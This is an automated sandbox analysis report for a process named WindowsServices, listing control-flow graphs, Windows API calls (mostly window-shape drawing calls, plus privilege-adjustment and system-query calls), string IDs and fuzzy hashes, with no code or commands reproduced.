                                                                        control_flow_graph 1221 404ec0-404ef6 CopyRect call 403c20 1224 404f06-404f28 CopyRect call 403c20 1221->1224 1225 404ef8-404f03 1221->1225 1228 404f38-404f5a CopyRect call 403c20 1224->1228 1229 404f2a-404f35 1224->1229 1232 404f6a-404f8c CopyRect call 403c20 1228->1232 1233 404f5c-404f67 1228->1233 1236 404f9c-404fbe CopyRect call 403c20 1232->1236 1237 404f8e-404f99 1232->1237 1240 404fc0-404fcb 1236->1240 1241 404fce-404ff0 CopyRect call 403c20 1236->1241 1244 405000-405022 CopyRect call 403c20 1241->1244 1245 404ff2-404ffd 1241->1245 1248 405032-405054 CopyRect call 403c20 1244->1248 1249 405024-40502f 1244->1249 1252 405064-405086 CopyRect call 403c20 1248->1252 1253 405056-405061 1248->1253 1256 405096-4050b8 CopyRect call 403c20 1252->1256 1257 405088-405093 1252->1257 1260 4050c8-4050ea CopyRect call 403c20 1256->1260 1261 4050ba-4050c5 1256->1261 1264 4050fa-40511c CopyRect call 403c20 1260->1264 1265 4050ec-4050f7 1260->1265 1268 40512c-40514e CopyRect call 403c20 1264->1268 1269 40511e-405129 1264->1269 1272 405150-40515b 1268->1272 1273 40515e-405180 CopyRect call 403c20 1268->1273 1276 405190-4051b2 CopyRect call 403c20 1273->1276 1277 405182-40518d 1273->1277 1280 4051c2-4051e4 CopyRect call 403c20 1276->1280 1281 4051b4-4051bf 1276->1281 1284 4051f4-405216 CopyRect call 403c20 1280->1284 1285 4051e6-4051f1 1280->1285 1288 405226-405248 CopyRect call 403c20 1284->1288 1289 405218-405223 1284->1289 1292 405258-40527a CopyRect call 403c20 1288->1292 1293 40524a-405255 1288->1293 1296 40528a-4052b7 CopyRect call 403c20 1292->1296 1297 40527c-405287 1292->1297
                                                                        APIs
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404ED6
                                                                          • Part of subcall function 00403C20: _ftol.MSVCRT ref: 00403D58
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404F10
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000016.00000002.1862981113.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000016.00000002.1862785394.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1862981113.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1862981113.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1866975540.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1867296525.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_22_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CopyRect$_ftol
                                                                        • String ID: BottoFlowerPetal2$BottomFlowerPetal1$BottomFlowerPetal3$LeftFlowerPetal1$LeftFlowerPetal2$LeftFlowerPetal3$Polygon14$Polygon15$Polygon16$Polygon17$Polygon2$Polygon3$Polygon31$Polygon32$RightFlowerPetal1$RightFlowerPetal2$RightFlowerPetal3$TopFlowerPetal$TopFlowerPetal1$TopFlowerPetal2
                                                                        • API String ID: 1144628616-677921438
                                                                        • Opcode ID: 1dab24f9fa47664b03d749d1ed14e596c18f688459fec3e730af87b273ffaf24
                                                                        • Instruction ID: 8a5b5832819b54604f0eb40b5f2cfffe4246f56c5ea39582f8810119041c68d6
                                                                        • Opcode Fuzzy Hash: 1dab24f9fa47664b03d749d1ed14e596c18f688459fec3e730af87b273ffaf24
                                                                        • Instruction Fuzzy Hash: EDA1C3BB6443103AE210B259AC42EAB676CDBE8724F408C3BF958D11C1F57DDA18C7B6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1349 40b10f-40b184 __set_app_type __p__fmode __p__commode call 40b295 1352 40b192-40b1e9 call 40b280 _initterm __getmainargs _initterm 1349->1352 1353 40b186-40b191 __setusermatherr 1349->1353 1356 40b225-40b228 1352->1356 1357 40b1eb-40b1f3 1352->1357 1353->1352 1358 40b202-40b206 1356->1358 1359 40b22a-40b22e 1356->1359 1360 40b1f5-40b1f7 1357->1360 1361 40b1f9-40b1fc 1357->1361 1363 40b208-40b20a 1358->1363 1364 40b20c-40b21d GetStartupInfoA 1358->1364 1359->1356 1360->1357 1360->1361 1361->1358 1362 40b1fe-40b1ff 1361->1362 1362->1358 1363->1362 1363->1364 1365 40b230-40b232 1364->1365 1366 40b21f-40b223 1364->1366 1367 40b233-40b23e GetModuleHandleA call 40b2a2 1365->1367 1366->1367 1369 40b243-40b260 exit _XcptFilter 1367->1369
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000016.00000002.1862981113.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000016.00000002.1862785394.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1862981113.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1862981113.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1866975540.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1867296525.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_22_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                        • String ID:
                                                                        • API String ID: 801014965-0
                                                                        • Opcode ID: 4e1e83045593532e3e54d4086fe12bd443ea795f31f0b1fa31bee2aa57048aae
                                                                        • Instruction ID: 92e6429448b312161c6c86a2e6f2100586677b1d17cdbc89596afef87365b123
                                                                        • Opcode Fuzzy Hash: 4e1e83045593532e3e54d4086fe12bd443ea795f31f0b1fa31bee2aa57048aae
                                                                        • Instruction Fuzzy Hash: 68416FB5800344EFDB209FA5D889AAE7BB8EB09714F20067FE551A72E1D7784841CB9C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1370 404360-4044a9 call 4048b0 call 40adf6 call 40adf0 call 40adea 1379 404552-40455e 1370->1379 1380 4044af-4044b1 1370->1380 1381 404560-404572 CreatePolygonRgn call 40ae02 1379->1381 1382 4045cb-4045d4 CreatePolygonRgn call 40ae02 1379->1382 1380->1379 1383 4044b7-4044bd 1380->1383 1391 404574-404576 1381->1391 1392 404578 1381->1392 1388 4045d9-4045db 1382->1388 1383->1379 1386 4044c3-4044c7 1383->1386 1389 4044cd-4044e3 1386->1389 1390 40454e 1386->1390 1393 4045e6-404667 call 40adcc * 4 1388->1393 1394 4045dd-4045e3 call 40add2 1388->1394 1395 4044e9-404548 _ftol * 2 1389->1395 1390->1379 1397 40457b-4045c9 CombineRgn CreatePolygonRgn call 40ae02 CombineRgn 1391->1397 1392->1397 1394->1393 1395->1395 1399 40454a-40454c 1395->1399 1397->1388 1399->1390
                                                                        APIs
                                                                        • _ftol.MSVCRT ref: 0040450A
                                                                        • _ftol.MSVCRT ref: 00404538
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 00404560
                                                                        • CombineRgn.GDI32(?,?,00000000,00000005), ref: 00404585
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040458F
                                                                        • CombineRgn.GDI32(?,?,?,00000002), ref: 004045C3
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 004045CB
                                                                        Memory Dump Source
                                                                        • Source File: 00000016.00000002.1862981113.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000016.00000002.1862785394.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1862981113.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1862981113.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1866975540.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1867296525.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_22_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CreatePolygon$Combine_ftol
                                                                        • String ID:
                                                                        • API String ID: 2242366081-0
                                                                        • Opcode ID: 76b59d60c353cbaa1d95a5d0ad8cfcc92339eaeaa5065b38da4cc76092f4088c
                                                                        • Instruction ID: 39bea9fad0b66382f5372ed494b3add627d4de448e91ddc4441a9f07906a4bc8
                                                                        • Opcode Fuzzy Hash: 76b59d60c353cbaa1d95a5d0ad8cfcc92339eaeaa5065b38da4cc76092f4088c
                                                                        • Instruction Fuzzy Hash: B09156B19083419FC310DF29C985A5BBBE4FFC4750F018A2EF999A7291DB34D814CB86
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1410 403e10-403f48 call 4048b0 * 2 call 40adf6 call 40adf0 call 40adea 1421 403fd1-403fdd 1410->1421 1422 403f4e-403f50 1410->1422 1424 40404a-404053 CreatePolygonRgn call 40ae02 1421->1424 1425 403fdf-403ff1 CreatePolygonRgn call 40ae02 1421->1425 1422->1421 1423 403f52-403f56 1422->1423 1423->1421 1426 403f58-403f6e 1423->1426 1431 404058-40405a 1424->1431 1435 403ff3-403ff5 1425->1435 1436 403ff7 1425->1436 1429 403f74-403fcb _ftol * 2 1426->1429 1429->1429 1434 403fcd-403fcf 1429->1434 1432 404065-4040e6 call 40adcc * 4 1431->1432 1433 40405c-404062 call 40add2 1431->1433 1433->1432 1434->1421 1439 403ffa-404048 CombineRgn CreatePolygonRgn call 40ae02 CombineRgn 1435->1439 1436->1439 1439->1431
                                                                        APIs
                                                                        • _ftol.MSVCRT ref: 00403F95
                                                                        • _ftol.MSVCRT ref: 00403FBF
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 00403FDF
                                                                        • CombineRgn.GDI32(?,?,00000000,00000005), ref: 00404004
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040400E
                                                                        • CombineRgn.GDI32(?,?,?,00000002), ref: 00404042
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040404A
                                                                        Memory Dump Source
                                                                        • Source File: 00000016.00000002.1862981113.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000016.00000002.1862785394.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1862981113.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1862981113.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1866975540.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1867296525.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_22_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CreatePolygon$Combine_ftol
                                                                        • String ID:
                                                                        • API String ID: 2242366081-0
                                                                        • Opcode ID: dbf15af777a9242a6ab4e2c7a6b65f1fdb691b85148fe195744af21802976117
                                                                        • Instruction ID: d78316a0bae83b4357ed0e5d5a94130920efe7575c7a00bd962797de7769c8fd
                                                                        • Opcode Fuzzy Hash: dbf15af777a9242a6ab4e2c7a6b65f1fdb691b85148fe195744af21802976117
                                                                        • Instruction Fuzzy Hash: 189179B1A083419FC310DF25C985A5BBBF4FF88714F118A2DF99AA7291DB34D914CB86
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CreateCompatibleDC.GDI32(?), ref: 00409EBE
                                                                        • LPtoDP.GDI32(?,?,00000002), ref: 00409EDA
                                                                        • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00409EFB
                                                                        • GetMapMode.GDI32(?,0040C6D4,00000000), ref: 00409F22
                                                                        • DPtoLP.GDI32(?,?,00000002), ref: 00409F3E
                                                                        • GetWindowRect.USER32(?,?), ref: 00409F87
                                                                        • BitBlt.GDI32(?,?,?,?,?,?,?,?,00CC0020), ref: 00409FFA
                                                                        Memory Dump Source
                                                                        • Source File: 00000016.00000002.1862981113.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000016.00000002.1862785394.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1862981113.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1862981113.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1866975540.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1867296525.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_22_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CompatibleCreate$BitmapModeRectWindow
                                                                        • String ID:
                                                                        • API String ID: 1654611898-0
                                                                        • Opcode ID: 24ead7c7138b67f3a46476f4c84bfb2031621dddb6359352eea06206daee3e16
                                                                        • Instruction ID: 387955213cf341242af21f02e85b7fd3331607f5cb7a19bffeb898acdc1f93f5
                                                                        • Opcode Fuzzy Hash: 24ead7c7138b67f3a46476f4c84bfb2031621dddb6359352eea06206daee3e16
                                                                        • Instruction Fuzzy Hash: 997127711183409FC314DF64C88496FBBF8EBC9704F108A2EF6A693291DB79E905CB96
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 00401000: CopyRect.USER32(?,0040E020), ref: 0040100D
                                                                        • _ftol.MSVCRT ref: 00409CF7
                                                                        • _ftol.MSVCRT ref: 00409D0E
                                                                        • _ftol.MSVCRT ref: 00409D2B
                                                                        • GetWindowRect.USER32(?,?), ref: 00409D86
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 00402516
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040253E
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040255E
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040257E
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040259E
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 004025BE
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 004025DE
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 004025FE
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040261E
                                                                        • SetWindowRgn.USER32(?,0040C340,00000001), ref: 00409DBF
                                                                        • SetCapture.USER32(?), ref: 00409DC9
                                                                        Memory Dump Source
                                                                        • Source File: 00000016.00000002.1862981113.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000016.00000002.1862785394.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1862981113.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1862981113.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1866975540.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1867296525.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_22_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$Copy$_ftol$Window$Capture
                                                                        • String ID:
                                                                        • API String ID: 1685161017-0
                                                                        • Opcode ID: 4a7094b539b862f338539457f0d8793b4a741916dd4dc3ebb93e6d5d52ff0bfe
                                                                        • Instruction ID: 353ad75620bb99855249955aa37f7dffc4285601670c8d5eecd51fb0f0ccdc6c
                                                                        • Opcode Fuzzy Hash: 4a7094b539b862f338539457f0d8793b4a741916dd4dc3ebb93e6d5d52ff0bfe
                                                                        • Instruction Fuzzy Hash: 1F416DB12187068FC304DF7AC98595BBBE8FBC8704F044A3EB49993381DB74E9098B56
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1505 40a940-40a999 GetWindowRect 1506 40aa54-40aa7e ClientToScreen call 40b08a 1505->1506 1507 40a99f-40a9a0 1505->1507 1509 40aa83-40aabc call 40adcc 1506->1509 1507->1509 1510 40a9a6-40a9a8 1507->1510 1511 40a9b2-40a9e6 call 4052c0 _ftol 1510->1511 1512 40a9aa-40a9ac 1510->1512 1511->1509 1517 40a9ec-40a9f1 1511->1517 1512->1509 1512->1511 1517->1509 1518 40a9f7-40aa4b call 40afbe GetWindowRect call 40afb8 call 405300 SetWindowRgn 1517->1518 1525 40aa4d call 40a440 1518->1525 1526 40aa52 1525->1526 1526->1509
                                                                        APIs
                                                                        • GetWindowRect.USER32(?,?), ref: 0040A97F
                                                                        • _ftol.MSVCRT ref: 0040A9D4
                                                                        • GetWindowRect.USER32(?,?), ref: 0040AA11
                                                                        • SetWindowRgn.USER32(?,0040C340,00000001), ref: 0040AA45
                                                                        • ClientToScreen.USER32(?,?), ref: 0040AA5D
                                                                        Memory Dump Source
                                                                        • Source File: 00000016.00000002.1862981113.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000016.00000002.1862785394.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1862981113.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1862981113.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1866975540.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1867296525.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_22_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Rect$ClientScreen_ftol
                                                                        • String ID:
                                                                        • API String ID: 2665761307-0
                                                                        • Opcode ID: b998918826c77febf2a25c4be3886caa5153053d104f383c60fb6be50d5108d4
                                                                        • Instruction ID: a66530a9fee688cda4384b7b61b220c0551d436bf9aef3ce9762855fe69dfb7b
                                                                        • Opcode Fuzzy Hash: b998918826c77febf2a25c4be3886caa5153053d104f383c60fb6be50d5108d4
                                                                        • Instruction Fuzzy Hash: 58413C752047059FC714DF25C98492BB7E9FBC8B04F004A2EF98693790DB38E909CBA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000016.00000002.1862981113.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000016.00000002.1862785394.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1862981113.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1862981113.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1866975540.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000016.00000002.1867296525.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_22_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: _ftol$CreatePolygonRegion
                                                                        • String ID:
                                                                        • API String ID: 4272746700-0
                                                                        • Opcode ID: 17b7e62d37637a2d73482e15072a4be556ec02c4b51384e8a89ed16f1ffde3de
                                                                        • Instruction ID: bbc22f1e7c48a6dab8c73f5009b7f3ca445a8864c2917b6fdd274eb9f33cd00a
                                                                        • Opcode Fuzzy Hash: 17b7e62d37637a2d73482e15072a4be556ec02c4b51384e8a89ed16f1ffde3de
                                                                        • Instruction Fuzzy Hash: FF5113B5A087029FC300DF25C58491ABBF4FF88750F118A6EF895A2391EB35D925CB86
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Callgraph

                                                                        • Executed
                                                                        • Not Executed
                                                                        • Opacity -> Relevance
                                                                        • Disassembly available
                                                                        callgraph 0 Function_04D308D3 1 Function_00E8A7EC 2 Function_00E8A56E 3 Function_00E8AAEE 4 Function_04D311D5 5 Function_01010606 6 Function_00E8A960 7 Function_04D306DB 8 Function_00E8A361 9 Function_04D30A5A 10 Function_00E8A462 11 Function_00E82264 12 Function_00E82364 13 Function_00E8A5E4 14 Function_0101000C 15 Function_00E8A078 16 Function_04D30C43 17 Function_01010710 18 Function_00E8A67B 19 Function_00E8247D 20 Function_00E8A2FE 21 Function_00E821F0 22 Function_00E825F1 23 Function_00E823F4 24 Function_00E8A776 25 Function_00E8A8CA 26 Function_04D30AF6 27 Function_04D30FF5 28 Function_00E8A140 29 Function_00E8A540 30 Function_00E8AAC0 31 Function_00E82044 32 Function_00E824C5 33 Function_00E8AA46 34 Function_00E8ABC6 35 Function_00E82458 36 Function_04D30BE3 37 Function_00E8A45C 38 Function_00E8A25E 39 Function_00E820D0 40 Function_00E8A5D1 41 Function_00E8A751 42 Function_0101073B 43 Function_00E8A2D2 44 Function_04D30268 45 Function_04D313E8 46 Function_04D3006F 47 Function_04D3096F 48 Function_010105C0 49 Function_04D30392 50 Function_00E8A6AE 51 Function_00E8A02E 52 Function_01010648 66 Function_0101066A 52->66 53 Function_010105D0 54 Function_04D30080 55 Function_00E823BC 56 Function_00E8213C 57 Function_00E8A23C 58 Function_04D30007 59 Function_00E8A0BE 60 Function_00E8A73F 61 Function_00E82430 62 Function_00E822B4 63 Function_010105E0 64 Function_00E8A20C 65 Function_00E8A602 67 Function_0101026D 68 Function_00E82005 69 Function_00E8A005 70 Function_04D30B3E 71 Function_00E8A486 72 Function_00E8A186 73 Function_00E82098 74 Function_00E8A99A 75 Function_04D30727 76 Function_01010074 77 Function_00E82310 78 Function_00E8A812 79 Function_00E8A392 80 Function_00E8AB92 81 Function_04D30429 82 Function_00E8A893 83 Function_00E82194 84 Function_00E8AA15 85 Function_0101067F

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 136 e8a893-e8a8f7 140 e8a8f9 136->140 141 e8a8fc-e8a90b 136->141 140->141 142 e8a90d-e8a92d AdjustTokenPrivileges 141->142 143 e8a94e-e8a953 141->143 146 e8a92f-e8a94b 142->146 147 e8a955-e8a95a 142->147 143->142 147->146
                                                                        APIs
                                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 00E8A913
                                                                        Memory Dump Source
                                                                        • Source File: 00000019.00000002.1919595339.0000000000E8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_25_2_e8a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustPrivilegesToken
                                                                        • String ID:
                                                                        • API String ID: 2874748243-0
                                                                        • Opcode ID: 1589fa8bfa869290b078d740b69a28d582506654fbe58464e70491422b416909
                                                                        • Instruction ID: fa2c61ad25522d083b6fbbfd8deda33b16568ecf1813b9f34a388b1ce7e40c96
                                                                        • Opcode Fuzzy Hash: 1589fa8bfa869290b078d740b69a28d582506654fbe58464e70491422b416909
                                                                        • Instruction Fuzzy Hash: D521A6755097809FEB128F25DC44B52BFF4EF06314F0D84EBE9898B563D2719918CB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 216 e8aa15-e8aa79 218 e8aa7b-e8aa8e NtQuerySystemInformation 216->218 219 e8aaa6-e8aaab 216->219 220 e8aaad-e8aab2 218->220 221 e8aa90-e8aaa3 218->221 219->218 220->221
                                                                        APIs
                                                                        • NtQuerySystemInformation.NTDLL ref: 00E8AA81
                                                                        Memory Dump Source
                                                                        • Source File: 00000019.00000002.1919595339.0000000000E8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_25_2_e8a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: InformationQuerySystem
                                                                        • String ID:
                                                                        • API String ID: 3562636166-0
                                                                        • Opcode ID: 5fc1e9c0e452309f638b3c653ef0b843b45bf49b49553f1e83bb9d38e60e0d78
                                                                        • Instruction ID: 76a040eb74842cdfdbbdd0a55c1ff5a49e3302a7b27478882cca3054d7bf31ec
                                                                        • Opcode Fuzzy Hash: 5fc1e9c0e452309f638b3c653ef0b843b45bf49b49553f1e83bb9d38e60e0d78
                                                                        • Instruction Fuzzy Hash: 62118E724093809FDB228F15DD45A52FFB4EF06324F0D84DBE9884B663D275A918CB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 236 e8a8ca-e8a8f7 237 e8a8f9 236->237 238 e8a8fc-e8a90b 236->238 237->238 239 e8a90d-e8a915 AdjustTokenPrivileges 238->239 240 e8a94e-e8a953 238->240 241 e8a91b-e8a92d 239->241 240->239 243 e8a92f-e8a94b 241->243 244 e8a955-e8a95a 241->244 244->243
                                                                        APIs
                                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 00E8A913
                                                                        Memory Dump Source
                                                                        • Source File: 00000019.00000002.1919595339.0000000000E8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_25_2_e8a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustPrivilegesToken
                                                                        • String ID:
                                                                        • API String ID: 2874748243-0
                                                                        • Opcode ID: 9790042b9e5a49cab3cbb92746ae3fbc2d38223602ef4fac178cd9b5ea170724
                                                                        • Instruction ID: 4356ce1bd5d37f72dab297b6bd030a44527b5f6fed559eb6ba2c3ca2e001b266
                                                                        • Opcode Fuzzy Hash: 9790042b9e5a49cab3cbb92746ae3fbc2d38223602ef4fac178cd9b5ea170724
                                                                        • Instruction Fuzzy Hash: 7B11A0765042009FEB20DF55E948B52FBE4EF04320F0884AADD498B656D371E818DF62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • NtQuerySystemInformation.NTDLL ref: 00E8AA81
                                                                        Memory Dump Source
                                                                        • Source File: 00000019.00000002.1919595339.0000000000E8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_25_2_e8a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: InformationQuerySystem
                                                                        • String ID:
                                                                        • API String ID: 3562636166-0
                                                                        • Opcode ID: 548a157f42ca6335a5b40b5202dc8e778dbc8143362d3bb4e1a04ac1abeb4f9d
                                                                        • Instruction ID: 848d2b321189a253335bbbca47876c70e0224b5bfd8ac9956d301d63c5e5f8c5
                                                                        • Opcode Fuzzy Hash: 548a157f42ca6335a5b40b5202dc8e778dbc8143362d3bb4e1a04ac1abeb4f9d
                                                                        • Instruction Fuzzy Hash: DB018F354002009FEB209F05DA88B62FBE4EF08724F0CC4AADE890AB51D375A418DFA2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 4d30392-4d303ec 8 4d303f2-4d3046b 0->8 9 4d30475-4d304aa 0->9 8->9 14 4d304b5-4d304c8 9->14 16 4d304ca 14->16 17 4d304cf-4d304e9 14->17 16->17 20 4d30520-4d30677 17->20 21 4d304eb-4d30515 17->21 40 4d306ff-4d30bb8 20->40 41 4d3067d-4d306bb 20->41 21->20 41->40
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000019.00000002.1928694207.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_25_2_4d30000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 2k$2k$a
                                                                        • API String ID: 0-3689935833
